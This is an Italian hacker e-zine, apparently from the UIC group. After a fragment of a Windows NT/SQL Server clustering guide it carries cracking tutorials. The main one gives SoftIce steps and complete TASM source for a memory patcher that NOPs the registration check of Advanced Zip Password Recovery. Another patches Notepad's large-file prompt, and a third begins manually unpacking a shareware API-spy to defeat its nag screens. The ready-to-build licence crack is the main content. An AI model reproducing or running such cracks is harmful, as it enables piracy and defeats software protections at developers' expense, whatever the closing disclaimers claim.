quindi non mi assumo responsabilità su nulla di ciò che può accadere.


Per capire questo tipo di configurazione prenderemo in esame un server
ridondato in due unita centrali, con unità di streaming formata da 3 dischi
precedentemente configurati con raid 1 tutti hot swap compresi quelli che
fungono da ridondanza sulle unita che d’ora in avanti chiameremo Nodo1
e Nodo2.
Per effettuare una corretta installazione e configurazione cluster dei server,
prima di qualsiasi operazione, bisogna assicurarsi che tutte le parti
hardware siano correttamente configurate, il sistema operativo installato in
maniera ineccepibile, ed avere disponibile un acesso alla rete locale. Se
questi prerequisiti non vengono soddisfatti in pieno, si rischia di trovarsi
dinnanzi a problemi di non facile soluzione. Quindi in nessun caso bisogna
procedere se prima non si è certi che hardware e sistema operativo siano
installati e configurati in manieracorretta.

Anche se uno solo dei pre-requisiti non viene rispettato possiamo trovarci
davanti a situazioni spiacevoli.

APPROCCIO ALL'INSTALLAZIONE

In linea di massima l’approccio all’installazione del clustering. Risulta
essere abbastanza laboriosa, nonostante ciò prestando attenzione non si
dovrebbero incontrare particolari difficoltà.

La prima cosa da fare è controllare l’ARRAY. Non ci sono particolari esigenze
di spazio su disco se non per l’unità cluster che deve essere di almeno 1Gb.
Per creare un array se non ne siete capaci basta leggervi il doc dal sito
microsoft se nò sto qui a scrive un botto e poi, cazzo! fate qualcosa no!

Quanto sopra esposto significa che comunque bisognerà avere un unità deputata
al clustering, potete chiamarla come volete ma è necessario che ci sia e che
non sia inferiore ad 1Gb altrimenti il servizio non ha abbastanza spazio per
poter lavorare in tranquillità e diventerebbe inaffidabile.

IMPORTANTISSIMO AVERE UNA LOG-IN ALLA RETE CHE ABBIA PRIVILEGI DI
AMMINISTRATORE.

Fatto questo bisogna andare ad indicare la configurazione della rete.
Bisogna creare un utente sul PDC. Questo utente che chiameremo CLUSTERADMIN
deve potersi loggare al dominio con privilegi di amministratore di rete.
Dobbiamo inoltre avere a disposizione 4 IP spare che assegneremo al
Nodo1 / Nodo2 /Server virtuale SQL / Intracluster .

Ricordate di non mettere simboli o slash o sottolineature nelle label.
Non sono ben tollerati e potrebbero creare confusione.

Prendiamo a questo punto il CD2 di Win NT enterprise andiamo nella dir mcsc
e lanciamo il setup del cluster. Durante l’installazione vi verrà proposto il
percorso mettete il percorso dell'intracluster che abbiamo nominato in
precedenza. Poi vi verrà chiesto i n°IP di rete ed altri due ip che dovranno
essere fittizi in quanto servono per la interconnessione frà nodo1 e nodo2
questi sono ip fittizi o virtuali.
Ricordate di leggere le stringhe di commento in testa alle finestre che
l’installazione vi propone e sarà tutto ancora più semplice. Per esempio io
per praticità ho assegnato il nome di PUBLICLAN alll’idirizzo col quale il
server entra nella rete. Controlliamo mentre facciamo l’operazione che sia
settato su “Only for Client Access” se così non fosse facciamolo noi per lui.

Andando aventi ci viene mostrato il secondo IP denominato “INTRACLUSTER”
assicuriamoci che sia settato “Use Only for Cluster Communication” se così
non fosse facciamolo noi per lui.
Ricordiamo che questo IP è quello della scheda intracluster dato all’inizio
dell’installazione ed è fittizio. Un altro IP che deve essere diverso da
quello del nodo1 appartiene al Nodo2 diverso ma uguale per tipologia.
ES: Nodo1 192.0.0.20 / Nodo2 192.0.0.40

Questa specie di LAN virtuale e formata da due schede dedicate che comunicano
trà loro tramite un cavo cross , in questo modo i due nodi parlano tra di
loro.

Una volta portate a termine tutte le operazioni descritte dobbiamo ripetere la
procedura sul secondo nodo. Spostiamoci con il tasto “Stamp” logghiamoci e
ripetiamo l’installazione del cluster come sopra descritto

ATTENZIONE!!! NEL MOMENTO IN CUI LANCIAMO IL SETUP E CI APPARE LA SCHERMATA
DOBBIAMO CAMBIARE IL TIPO DI INSTALLAZIONE. MENTRE SUL NODO1 ABBIAMO CREATO
UN NEW CLUSTER NEL NODO2 DOBBIAMO DIRGLI DI INSTALLARSI COME
“JOYNT-NEW-CLUSTER” Il motivo è ovvio dato che il Nodo2 altro non è che un
unità di ridondanza deve agganciarsi al cluster master che è presente sul
Nodo1. Se noi installassimo anche il Nodo2 come NEW CLUSTER e come se
mettessimo due periferiche EIDE su di uno stesso canale come master .
Sai che bordello!!
Vi ricordo che durante l’installazione dobbiamo fornire tutte le informazioni
richieste da setup quali nome Cluster ip password etc...

“Consiglio di mettere un'unica password per tutto, evitando confusione e
dimenticanze , altrimenti sono problemi.

Facciamo una verifica del nostro lavoro. Ora avremo nel nostro menu start di
windows la voce ADMINISTRATIVE CLUSTER avviamolo e completiamo la
configurazione:
Per ogni disco L’installazione li lascia fuori dal gruppo cluster, che e poi
quello che a noi interessa dobbiamo mettere ordine.
Ci troveremo quindi il nostro gruppo cluster e publiclan, sotto di loro tutte
le unità che abbiamo identificato con le label, dove vediamo il Quorum
clicchiamo con il tasto sul disco presente nella finestra di DX e selezioniamo
Change Group e mettiamolo in Cluster Group

“Il nome da noi dato al cluster”. Adesso ricordatevi di cancellare la vecchia
unita appena spostata controllando prima ciccandoci sopra che sia vuota,
verificato questo cancelliamola.
Ricordate che queste operazioni vanno ripetute su entrambi i nodi con l’unica
differenza che il nodo2 viene installato come joint "Come perchè?" allora
rileggete.

SE INVECE DOBBIAMO SPOSTARE IL SERVER SU UN'ALTRA LAN LA PROCEDURA NON CAMBIA
DI MOLTO:

La prima cosa da fare è disinstallare SQL virtual server. Andiamo sul tasto
avvio di windows SQL poi “Failover cluster wizzard” attenzione a non
sbagliarvi con l’altra voce di SQL per essere sicuri la voce è “SQL server7.0”
dopo pochi secondi SQL sarà disinstallato.

Ora dobbiamo disinstallare il cluster. Andiamo nel pannello di controllo
clicchiamo l’icona Add/Remove e disistalliamo la voce “Server Cluster”.
Fatto questo spostiamoci con il tasto “Stamp” sul nodo 2 e ripetiamo
l’operazione.
Ora torniamo sul nodo 1 è facciamo reeboot. Mentre fa il boot fate la stessa
cosa con il nodo due sempre utilizzando il tasto “stamp” per spostarvi.
Ora le macchine sono di nuovo su, logghiamoci con il nostro account creato
sul PDC all’inizio ed entriamo nel sistema. Se vogliamo andare a vedere
possiamo controllare l’esattezza delle label.
Nel nostro caso le ho configurate nel seguente modo “SQLexe = Utilizzato per
il prog SQL” Intracluster = Utilizzato per lo swap del cluster”
“SQLlog=Utilizzato per i log di SQL” Etc…

Ok ora disinstallate il prog SQL "Attenzione a non confondervi, il server
virtuale è una cosa, il prog un altra- CMQ il server e la prima voce il prog
la seconda del menù SQL"

Ora fate unistal del cluster e poi partite da capo dandogli le configurazioni
della nuova rete sulla quale operate.
INSOMMA DOVETE DA RICOMINCIA' DA CAPO.

Spero di essere stato chiaro ma l'articolo l'ho scritto in fretta cercherò di
migliorami ;-)
Per insulti parolacce pernacchi: maggiorana@tiscalinet.it

Se volete venirmi a trovare nella mia tana: members.xoom.it/maggiorana

---Maggiorana---

---------------------------------------------------------------[ cRacKinG ]---
===] ADVANCED ZIP PASSWORD RECOVERY V2.2 ]====================================
-----[ Quequero ]-------------------------------------------------------------

(Patching in memory)


Una luce splendente, elegante come il sol levante, apparve all' orizzonte.
Arrivò silenzioso un fautore del buon umore. Vi presento qualcosa di nuovo,
un tutorial sul patching in memory di un programma packato col NeoLite,
non è semplicissimo ma vi sarà comunque molto utile

Col suo mantello color cammello scese dal ciel un uomo gaio, si posò su un
albero e disse: "Miiiii sono Quequero".

UIC's form Home page se presente: http://www.uic-spippolatori.com
E-mail: UIC@mail.usa.com
In AzzurraNet: #crack-it #ahccc

Difficoltà
( )NewBies (X)Intermedio (X)Avanzato ( )Master


Ecco come si fa a crackare un programma senza averi bisogno di unpackarlo :).

-----------------------------------------------------------------------------

Advanced Zip Password Recovery v2.2
(Patching in memory)
Written by Quequero

-[ Introduzione ]-

Advanced Zip Password Recovery è un tool compresso con il caro neolite, non è
difficile da unpackare ma noi creeremo un programma che ci permetterà di
crackarlo in memoria senza per questo doverlo unpackare.

-[ Tools usati ]-

SoftIce qualunque versione
Turbo Assembler 5.0
Spy++
W32.inc (nell'allegato assieme ai sorgenti)

-[ URL o FTP del programma ]-

http://www.eclomsoft.com/azpr.html

-[ Notizie sul programma ]-

Advanced Zip Password Recovery (AZPR d'ora in poi) è un utile programmino che
ci permette di bruteforzare i file zip per poi trovarne le password

=] Essay [=

AZPR è abbastanza utile come programma ma se non lo registriamo allora non ci
permetterà di bruteforzare password più lunghe di 5 caratteri grgrgrgrgr, la
cosa in effetti non ci piace ma noi comunque non siamo interessati a questo,
infatti un giorno potrebbe capitarci di incontrare un programma unpackabile
(moooooolto improbabile) o che non riusciamo ad unpackare(già più probabile :)

Allora cosa facciamo, lasciamo la vittoria ai programmatori? Mai! Quindi
alleniamo ci per prospettive future :). Per prima cosa dobbiamo crackare il
programma, non mi dilungherò più di tanto su questo dal momento che il nostro
target è un altro, quindi avviamo il programma e come ovvio ci mostra la sua
scrittina "Unregistered", bene, procedendo per ipotesi iniziamo a brekkare
sulle API che gestiscono il registro di Windows perchè forse il serial è letto
da lì....quindi fire up your winice (ctrl+d) e settate un bpx su
RegQueryValueExA....

O se preferite brekkate direttamente così: bpx RegQueryValueExA if
ecx = = 70FCFC, premete F11
e sarete approdati al posto giusto, disabilitate i breakpoint con "bd *" e
steppate con F10 fino a:

xxxx:0040C733 E800FEFFFF call 0040C538

questa è la chiamata che decide se il programma è registrato o meno, se
riporta 1 lo è altrimenti no...Steppate ancora con F10 finchè non arriverete
qui:

xxxx:0040258C 7479 jz 00402607

se il programma arrivato a questo punto salta, allora non è bene :) se non
salta invece apparirà come registrato, ottimo, ciò che dobbiamo fare è
semplicemente noppare questi due byte....Bhè facciamolo...ma facciamolo in
memoria.

Il crack è stato abbastanza rapido :) questa parte invece non so come verrà
fuori dal momento che evito di cercare tute su argomenti che conosco poco onde
evitare di essere influenzato,(anche se mi sono rimaste delle reminescenze di
qualche tute su fravia) quindi farò secondo cioè che mi è venuto in mente e
cercherò di esporvi tutto con chiarezza :)

PATCHING IN MEMORY

Bene, iniziamo col pianificare i nostri scopi malevoli :), per prima cosa
abbiamo bisogno di dire a WinPorco in quale processo andare a mettere le mani
e per farlo abbiamo bisogno di trovarlo questo processo....Come? Bhè, io ho
pensato di usare un bel FindWindow che ha anche una semplice sintassi:

HWND FindWindow( LPCTSTR lpClassName, // puntatore al nome della classe
LPCTSTR lpWindowName // puntatore al nome della finestra
);

Se il valore riportato è 0 allora c'è stato un errore altrimeni in eax
ritroveremo l'handle della finestra.
Andiamo quindi a scrivere il nostro programma, prima di tutto dobbiamo sapere
come si chiama la classe della finestra, per far questo avviate AZPR, aprite
spy++, clickate su refresh e cercate la finestra:
C30h nel mio caso è l'handle della finestra (quello che ci troveremo con
FindWindow, "AZPR
version 2.0 - unregistered" è la caption della finestra e TForm1 è la classe,
cioè quello che ci interessa, allora iniziamo ad abbozzare qualcosa nel nostro
programmino:

.386P
LOCALS
JUMPS
.MODEL FLAT, STDCALL
UNICODE=0
INCLUDE W32.inc ; W32.inc lo trovate nell'allegato assieme ai sorgenti

.data

class db "TForm1",0 ; ecco il nome della classe che ci interessa

.code
start:
xor eax, eax ; meglio metterlo onde evitare che qualcosa vada storto...in
fondo sono solo 2 byte :)

call FindWindow, offset class, NULL ; la nostra cara chiamatina

int 3 ; ci servirà per il debug

end start

bene, compilate il tutto con:
tasm32 -ml -m5 /t -q patchinmen
tlink32 -Tpe -aa -x -c patchinmen ,,, import32

mettete in sice un bpint 3, avviate il prog e non dovete far altro che vedere
se in eax, c'è zero o qualcos'altro, se c'è qualcos'altro allora è andato a
buon fine....proviamo......avvio.....ottimo, eax contiene proprio C30h
(attenti che a voi l'handle sarà diverso).

Adesso dall'handle dobbiamo risalire all'ID del processo, e possiamo usare
GetWindowThreadProcessId, ecco la sintassi:

DWORD GetWindowThreadProcessId(

HWND hWnd, // handle della finestra
LPDWORD lpdwProcessId // indirizzo di una variabile per l'ID del processo
);

quindi andiamo ad aggiungere questa funzione al nostro programma che così
diventa:

.386P
LOCALS
JUMPS
.MODEL FLAT, STDCALL
UNICODE=0
INCLUDE W32.inc

extrn GetWindowThreadProcessId:Proc ; Questa volta l'API la dobbiamo definire

.data

class db "TForm1",0
handle dd 1 dup (0) ; qua ci mettiamo l'handle
ProcessID dd 1 dup (0) ; e qua il PID

.code
start:
xor eax, eax
call FindWindow, offset class, NULL
mov handle, eax
call GetWindowThreadProcessId, handle, offset ProcessID
int 3
end start

compiliamo.....testiamo...oki la chiamata riporta il un valore che
evidentemente sarà il PID :)
a questo punto siamo in grado di aprire il processo con OpenProcess....

HANDLE OpenProcess(

DWORD dwDesiredAccess, // flag di accesso
BOOL bInheritHandle, // ereditazione dell'handle
DWORD dwProcessId // process identifier
);

qua l'unic

  
a cosa da spiegare sono i flag, ne esistono molteplici che potrete
vedere su win32.hlp, ma io vi elenco l'unico che ci serve cioè:

PROCESS_ALL_ACCESS che corrisponde al valore di FFFh, ma che è inserito cmq
nel file W32.inc, e quindi non dobbiamo preoccuparci di definirlo, andiamo
ancora una volta a modificare il nostro programma aggiungedoci la funzione
OpenProcess con i parametri che ci interessano quindi PROCESS_ALL_ACCESS come
primo parametro, il secondo lo settiamo a FALSE ed il terzo valore lo
prendiamo dall'ultima call, ma facciamo un'ultima modifca, riapriamo Spy++,
clickiamo sulla nostra finestra e ci appare il menu di prima, andiamo su
"Windows" e vediamo qual'è la finestra "principale" che troviamo all'ultima 3
riga:

adesso sappiamo che l'handle della finestra principale è 57C, quindi nella
lista di spy++ cerchiamo questa finestra (che in realtà sta una riga sotto la
finestra di prima :), troviamone la classe che è TApplication e sostituiamola
nel codice a TForm, quindi alla fine avremo ciò:

class db "TApplication",0 ; Usiamo questa perchè è meglio
operare sulla finestra principale
handle dd 1 dup (0)
ProcessID dd 1 dup (0)
ProcessHandle dd 1 dup (0)

.code
start:

xor eax, eax
call FindWindow, offset class, NULL
mov handle, eax
call GetWindowThreadProcessId, handle, offset ProcessID
call OpenProcess, PROCESS_ALL_ACCESS, FALSE, dword ptr[ProcessID] ; Ecco la
nostra
nuova
chiamata

mov ProcessHandle, eax ; Spostiamo l'handle in un buffer per usarlo poi in
futuro int 3

Andiamo a debuggare il tutto, se la chiamata a OpenProcess vi riporta 0 allora
è fallita, altrimenti è andata a buon fine, di consegueza se tutto è a posto
(e vi ricordo che dovete debuggare il tutto con AZPR in esecuzion) possiamo
procedere a trovare la locazione di memoria che ci interessa patchare. Come
precedentemente detto nel tute il jump che ci interessa noppare sta al
RVA 0040258C, dovete sapere che ogni applicazione ha un suo range di memoria
da poter usare e ciò che abbiamo fatto con OpenProcess è stato solo di aprire
il processo di AZPR per poter andar a leggere nella memoria del programma in
esecuzione, ora però prima di continuare nel patch dobbiamo controllare se
effettivamente la versione i byte che ci interessano sono presenti, per far
ciò useremo WriteProcessMemory, una funzione estremamente semplice:

BOOL ReadProcessMemory(

HANDLE hProcess, // handle del processo nel quale dobbiamo andare a leggere
LPCVOID lpBaseAddress, // indirizzo nel quale iniziare la lettura
LPVOID lpBuffer, // indirizzo di un buffer nel quale piazzare i dati letti
DWORD nSize, // numero di byte da leggere
LPDWORD lpNumberOfBytesRead // indirizzo del numero dei byte letti
);

come vedete la funzione non presenta nessuna difficoltà, ci serve solo
conoscere l'indirizzo nel quale andare a leggere i dati, e la guida di
winfrocio ci dice anche che l'ultimo parametro può essere NULL, quindi ora che
sappiamo quale deve essere l'RVA andiamo a scrivere un'altra volta il nostro
programma:

class db "TApplication",0
handle dd 1 dup (0)
ProcessID dd 1 dup (0)
ProcessHandle dd 1 dup (0)
ReadBuffer dd 1 dup (0)
OrigBytes dw 7974h ; Bytes originali invertiti dal momento che gli
intel li invertono
CaptionDiff db 'Error!',0 ; MessageBox di avviso nel caso i byte non
vengano trovati
MessageDiff db 'Program version is probably different,',0dh,0ah
db 'crack not applied!',0

.code
start:

xor eax, eax
call FindWindow, offset class, NULL
mov handle, eax
call GetWindowThreadProcessId, handle, offset ProcessID
call OpenProcess, PROCESS_ALL_ACCESS, FALSE, dword ptr[ProcessID]
mov ProcessHandle, eax
mov eax, 0040258Ch
call ReadProcessMemory, [ProcessHandle], eax, offset ReadBuffer, 2, NULL ;
Qui andiamo a leggere la memoria

mov esi, offset OrigBytes ; E facciamo un compare tra i
mov edi, offset ReadBuffer ; byte letti
mov ecx, 2
repz cmpsb ; Corrispondono?
jnz Different ; Se la risposta è NO, allora manda la messagebox
int 3 ; Questo è il solito int3 per fare il debug

Different:
push MB_ICONSTOP or MB_OK
push offset CaptionDiff
push offset MessageDiff
push NULL
call MessageBoxA;, MB_ICONSTOP or MB_OK, offset CaptionDiff,
offset MessageDiff, NULL

end start

bene, se anche il check dei byte è superato possiamo andare a cambiarli con
due NOP. Ma c'è un piccolo problema, cioè che il programma fa quel check una
sola volta all'avvio, noi invece abbiamo operato ad applicazione già avviata e
quindi anche se modificassimo i byte non otterremmo nulla visto che il
programma è già in UNREGISTERED status :), per ovviare a questo problema
potremmo avviare l'applicazione con WinExec solo che questa API ci ritorna il
controllo solo dopo che l'applicazione è completamente avviata......
e di conseguenza anche dopo il check, quindi useremo l'API CreateProcess, mi
era stato suggerito di sospendere il thread con CREATE_SUSPENDED e poi di
riesumarlo, ma ho trovato un metodo un po' più semplice, cioè, avvieremo lo
stesso il programma con CreateProcess e con un loop cercheremo la locazione
e quindi la patcheremo, lasciate prima che vi spieghi come funziona
CreateProcess che è una della API più antipatiche :):

BOOL CreateProcess(
LPCTSTR lpApplicationName, // pointer to name of executable module
LPTSTR lpCommandLine, // pointer to command line string
LPSECURITY_ATTRIBUTES lpProcessAttributes, // pointer to process security
attributes
LPSECURITY_ATTRIBUTES lpThreadAttributes, // pointer to thread security
attributes
BOOL bInheritHandles, // handle inheritance flag
DWORD dwCreationFlags, // creation flags
LPVOID lpEnvironment, // pointer to new environment block
LPCTSTR lpCurrentDirectory, // pointer to current directory name
LPSTARTUPINFO lpStartupInfo, // pointer to STARTUPINFO
LPPROCESS_INFORMATION lpProcessInformation // pointer to PROCESS_INFORMATION
);

...Come prima parametro settiamo il nome dell'exe da eseguire (azpr.exe) il
secondo parametro non ci interessa e lo settiamo a NULL, il terzo parametro
anche, il 4° lo possiamo tranquillamente mettere a FALSE, questo comando serve
a specificare se l'handle ritornato potrà essere ereditabile dai processi
figli, il 5° lo settiamo a DEBUG_PROCESS, serve a specificare che il processo
deve essere trattato come un debugger, non è necessario ma mettiamocelo :),
il 6° lo settiamo a NORMAL_PRIORITY_CLASS visto che non ci interessa avere
una priorità di esecuzione più alta o più bassa, il 7° e 8° lo settiamo a NULL
mentre gli utlimi due necessitano di puntare rispettivamente ad una struttura
di Startup e ad una struttura di PROCESS_INFORMATION, non preoccupatevi non è
assolutamente difficile. Dopo ciò possiamo andare a scrivere la routine che
patcherà il programma in memoria, per far ciò aggiungeremo dopo
ReadProcessMemory il nostro bel WriteProcessMemory che presenta più o meno la
stessa sintassi dell'API affine:

BOOL WriteProcessMemory(

HANDLE hProcess, // handle del processo nel quale dobbiamo andare a scrivere
LPVOID lpBaseAddress, // indirizzo nel quale iniziare la scrittura
LPVOID lpBuffer, // puntatore a un buffer nel quale piazzare i dati da
scriverei
DWORD nSize, // numero di byte da scrivere
LPDWORD lpNumberOfBytesWritten // numero attuale di byte scritti
);

per l'ultima volta vi ripresento tutto il codice anche con quest'ultime
aggiunte ed anche ottimizzato con alcuni messagebox ed un loop che vi
spiegherò a fine listato:

.386P
LOCALS
JUMPS
.MODEL FLAT, STDCALL
UNICODE=0
INCLUDE W32.inc

extrn GetWindowThreadProcessId:Proc

.data

class db "TApplication",0
handle dd 1 dup (0)
ProcessID dd 1 dup (0)
ProcessHandle dd 1 dup (0)
ReadBuffer dd 1 dup (0)
OrigBytes dw 7974h ; Bytes originali invertiti
PatchBytes dw 9090h ; I byte con i quali cambieremo l'istruzione
CaptionDiff db 'Error!',0
MessageDiff db 'Program version is probably different,',0dh,0ah
db 'crack not applied!',0
CaptionSucc db 'Success!',0
MessageSucc db ' Crack successfully applied! ',0dh,0ah
db ' ',0dh,0ah
db ' Created By Quequero ',0dh,0ah
db ' FOR U.I.C. ',0dh,0ah
db ' http://quequero.cjb.net ',0
ExeName db 'azpr.exe',0
CaptionProb db 'Problem!!!',0
MessageProb db 'There is a problem, crack cannot be applied! ',0dh,0ah
db 'Here''s some possible solution: ',0dh,0ah
db '1) Name of .exe is different from azpr.exe
(if yes rename it) ',0dh,0ah
db '2) This crack is not in the same directory of the
program. ',0dh,0ah
db 'Try to move in the right directory, generally:
c:\program\AZPR',0

SecAttr STARTUPINFO <?> ; Questi sono i semplicissimi puntatori alle
strutture che vi indicato durante la
ProcInf PROCESS_INFORMATION <?> ; spiegazione del CreateProcess


.code
start:
call CreateProcess, offset ExeName, NULL, NULL, FALSE, DEBUG_PROCESS,
NORMAL_PRIORITY_CLASS, NULL, NULL,
offset SecAttr, offset ProcInf ; Ecco a voi il CreateProcess, se vi riporta
1 allora è tutto okkei

test eax, eax ; Il CreateProcess riporta 0?

jz Problem ; Se si vuol dire che ci sono dei problemi, mostra la messagebox
con le soluzioni

loop: call FindWindow, offset class, NULL ; Ecco il loop che vi spiegherò dopo
test eax, eax
jz loop
mov handle, eax
call GetWindowThreadProcessId, handle, offset ProcessID
call OpenProcess, PROCESS_ALL_ACCESS, FALSE, dword ptr[ProcessID]
mov ProcessHandle, eax
mov eax, 0040258Ch ; Muovi in eax l'RVA della locazione alla quale andremo
a leggere
call ReadProcessMemory, [ProcessHandle], eax, offset ReadBuffer, 2, NULL ;
Vai a leggere
mov esi, offset OrigBytes
mov edi, offset ReadBuffer
mov ecx, 2
repz cmpsb
jnz Different ; Confronta i byte e se sono uguali procedi, altrimenti
salta
mov eax, 0040258Ch
call WriteProcessMemory, [ProcessHandle], eax, offset PatchBytes, 2, NULL ;
Ottimo, sono uguali, allora cambiali

push MB_ICONINFORMATION or MB_OK
push offset CaptionSucc
push offset MessageSucc
push NULL
call MessageBoxA ; Mostra il box che ci dice che tutto è andato bene
call ExitProcess ; Ed esci

Different:
push MB_ICONSTOP or MB_OK
push offset CaptionDiff
push offset MessageDiff
push NULL
call MessageBoxA
call ExitProcess

Problem:
push MB_ICONSTOP or MB_OK
push offset CaptionProb
push offset MessageProb
push NULL
call MessageBoxA
call ExitProcess

end start

Ora state attenti che vi riassumo tutto quanto: per prima cosa il file viene
avviato con CreateProcess visto che ci rida il controllo all'istante, se la
funzione riporta 1 è andato tutto bene, se riporta 0 avete sbagliato qualcosa,
quindi viene eseguito un loop di FindWindow,perchè? Perchè in questo modo
facciamo un check continuo fino all'apparizione della nostra finestra e così
avremo il tempo di patchare i byte prima che il programma decida di non essere
registrato, appena FindWindow riporta un valore diverso da 0 chiamamo
GetWindowThreadId per ottenere l'ID del thread della finestra, se anche questa
va a buon fine otteniamo un ID che possiamo usare con OpenProcess per aprire
il processo. Aperto il processo andiamo a fare un confronto tra i byte che
"dovremmo" trovare e quelli che effettivamente troviamo, se sono uguali
procediamo col cambiarli e con l'avvisare l'utente che tutto è andato bene,
altrimenti facciamo comparire il box che ci informa di una diversità tra
l'exe che abbiamo e quello che dovremmo avere.

I check per vedere se tutto procede bene sono necessari solamente dopo il
CreateProcess ed al check tra i byte, non serve inserirne altri visto che le
possibilità di fallimento del WriteProcessMemory sono alquanto remote.

Nell'allegato troverete tutto il necessario alla compilazione del programma,
ovviamente non troverete il tasm che potrete scaricare tranuillamente sul
mio sito (Sezione Tools).

Forse la prossima volta creeremo un trainer, vi garantisco
comunque che fare un trainer è molto più semplice di patchare un programma
come questo in quanto non avete la necessità di cambiare i byte prima di
determinati eventi, prendete come esempio il numero di vite di un gioco, lo
potete cambiare quando volete, mia dopo certi eventi giusto?

Bhè ci siamo divertiti abbastanza, abbiamo imparato come patchare
in memoria un programma......non è mica una cosa da poco :))))

Note finali

I ringraziamenti sono d'obbligo stavolta, ma prima saluto tutti quelli della
UIC...Ciauzzzzzz.. ed ora quelli che si meritano un sentito ringraziamento:

Kill3xx: Grazie tantissimo che hai una soluzione per ogni problema, se non ci
fossi stato tu starei ancora provando chissà cosa per patchare il
programma prima del check :)

Xoanon: Mia musa ispiratrice che mi ha fatto venire un paio di ideuzze non
male per il programma

Neural_Noise: Grazie anche al mio cyberfratellino che è sempre gentile e che
mi voleva far creare thread su thread per patchare sto programma
:)))

Ciauz a tuttiiiiiiiiiiiiiiiiiiiiiiii

Disclaimer


Vorrei ricordare che il software va comprato e non rubato, dovete registrare
il vostro prodotto dopo il periodo di valutazione. Non mi ritengo responsabile
per eventuali danni causati al vostro computer determinati dall'uso improprio
di questo tutorial. Questo documento è stato scritto per invogliare il
consumatore a registrare legalmente i propri programmi, e non a fargli fare
uso dei tantissimi file crack presenti in rete, infatti tale documento aiuta
a comprendere lo sforzo immane che ogni singolo programmatore ha dovuto
portare avanti per fornire ai rispettivi consumatori i migliori prodotti
possibili.
Noi reversiamo al solo scopo informativo e di miglioramento del linguaggio
Assembly.
Capitoooooooo????? Bhè credo di si ;))))

---QueQuero---

---------------------------------------------------------------[ cRacKinG ]---
===] MINI REVERSE DI NOTEPAD ]================================================
-----[ Golem ]----------------------------------------------------------------

Non ci sarebbe bisogno di un disclaimer visto che non si fanno crack tuttavia
il modificare un programma, anche per migliorarlo, è espressamente vietato da
quasi tutti gli applicativi windows, pertanto tale documento è da intendersi
per soli scopi educativi e di informazione, l'autore declina ogni
responsabilità per eventuali malfunzionamenti.

Per far capire che reversing non vuol dire solo crack ma cercar di capire il
funzionamento di un programma e migliorarlo (o addattarlo alle nostre
esigenze) ho scritto questo tute di poche righe.

Quello che faremo è di una semplicità spaventosa, quindi non penso ci siano
problemi di comprendonio... (se si non posso farci nulla)

L'idea mi è venuta l'altra sera quando apprestandomi a leggere la scorsa
ezine in formato testo mi compariva una MessageBox dicendo che il file era
troppo grande e se desideravo aprirlo con il WordPad.

Ora io mi chiedo perchè devo perdere 2 secondi della mia vita per cliccare su
"SI" ?

Ho messo mano a SoftIce e mi son dato da fare...

Nota bene: io ho la versione di Notepad per Win95, dovrebbe essere uguale
anche per Win98 ma non ci giurerei, cmq il procedimento e' lo
stesso...

Mettiamo innanzitutto un "BPX MessageBoxA" e cerchiamo di aprire un file di
testo molto ampio (la ezine per esempio), Sice poppera' torneremo quindi al
programma (Notepad) che ha effettuato la call pigiando F11 Ci troveremo qui:

:00402D55 8B7508 mov esi, dword ptr [ebp+08] <-
:00402D58 6A00 push 00000000 <- Parametri x
MessageBox
:00402D5A FF35B0604000 push dword ptr [004060B0] <-
:00402D60 56 push esi <-
:00402D61 FF1530744000 Call dword ptr [00407430] <- Call alla
MessageBox

Seguito da due istruzioni che controllano la scelta da noi fatta "Si" o "No",
nel caso in cui rispondiamo "Si" il jump (jnz/jne) non è attivo e prosegue
con l'istruzione seguente...

:00402D67 83F806 cmp eax, 00000006
:00402D6A 0F85A9000000 jnz 00402E19
:00402D70 6804010000 push 00000104

Ora cancelliamo il precedente breakpoint con "bc *".

Il modo di procedere è lo stesso per rimuovere un qualsiasi nag, io preferisco
far jumpare il tutto andando direttamente all'istruzione corretta, ma volendo
potete noopare la call e cambiare il jne (jnz).

Apriamo il Notepad.exe con Hiew e andiamo alla nostra call (00402D60)
scorrendo con pagina giu', modificheremo quindi qualche istruzione sopra
facendo in modo che il programma apra automaticamente il WordPad.

Si tratta quindi di trasformare:

:00402D55 8B7508 mov esi, dword ptr [ebp+08]

(o un' altra linea)

In:

:00402D58 E913000000 jmp 000402D70

Possiamo farlo a mano o avvalerci delle funzionalità di hiew posizionandoci
sull'istruzione e premendo F3 (modifica) e F2 (asm) inserendo poi

"jmp 000402D70" che e' l'istruzione dopo il jump (quella a cui si andrebe
cliccando su SI)

Ecco tutto, vi avevo preventivato che era una cazzata, ma ci aiuta a ritrovare
il vero spirito del reversing, di coloro che vogliono cambiare cio' che non
gli piace...


On IRCnet : #crack-it ; #aisprod
On ICQ : 52067095
E-Mail : g0lem@SoftHome.com ; g0lem@hotmail.com

---Golem---

---------------------------------------------------------------[ cRacKinG ]---
===] LADDOVE PROCDUMP FALLISCE ARRIVA QUE :)]=================================
-----[ Quequero ]-------------------------------------------------------------

(Manual unpacking e cracking)

Checkov disse: le donne senza gli uomini appassiscono,
Bellissimo il tutorial di questo Quequero...:) scherzo, vi presento un tute
che dovrebbe piacervi assai :)...ciauzzz gli uomini senza le donne diventano
matti!...Bhè aveva ragione :)

Home page: http://www.uic-spippolatori.com
E-mail: UIC@mail.usa.com

-]Difficoltà [-

( )NewBies (X)Intermedio ( )Avanzato ( )Master


Siete pronti per unpackare un programma senza il procdump?
Allora viaaaaa!!!!!.

------------------------------------------------------------------------------

=] Introduzione [=

Unpackeremo manualmente e crackeremo un meraviglioso ed utilissimo tool

=] Tools usati [=

-SoftIce qualunque versione
-ADump
-ProcDump
-Hex-Workshop 3.01 o qualunque altro Hex-Editor
-Dei foglietti di carta e la calcolatrice di wintonno...una penna...
Si, il sangue va bene lo stesso :)

=]URL o FTP del programma [=

http://www.uic-spippolatori.com sezione tools

=] Notizie sul programma [=

Il pargolo è un piccolo ApiSpy, cioè uno di quei programmini che ti dico le
api che usano gli altri programmini :) ottimo anche come monitor durante il
cracking

=] Essay [=

Salve a tutti raga, scaricate ed installate questo magnifico programmino....
avviatelo e vedrete un brutto nag con scritto UNREGISTERED....non ci piace,
poi viene una messagebox che ci avvisa che il programma non è registrato e poi
troviamo anche un pulsante "register".....come se non bastasse non possiamo
salvare nel log più di venti chiamate......e che kazzo, non ci potevano mette
pure qualche funzione che ti faceva esplodere il pc se avviavi il pc troppe
volte? :)...hehe non disperate, siamo qui per porre rimedio a questi problemi,
il programma è il paziente malato e noi siamo i chirurghi con manie da jack
lo squaratore......Apis32.....TREMAAAAAAA :)!!!!!!!

Basta cazzate, iniziamo......Il programma è packato e questo lo si nota
soprattutto perchè se settiamo un breakpoint quello non dura neanche un
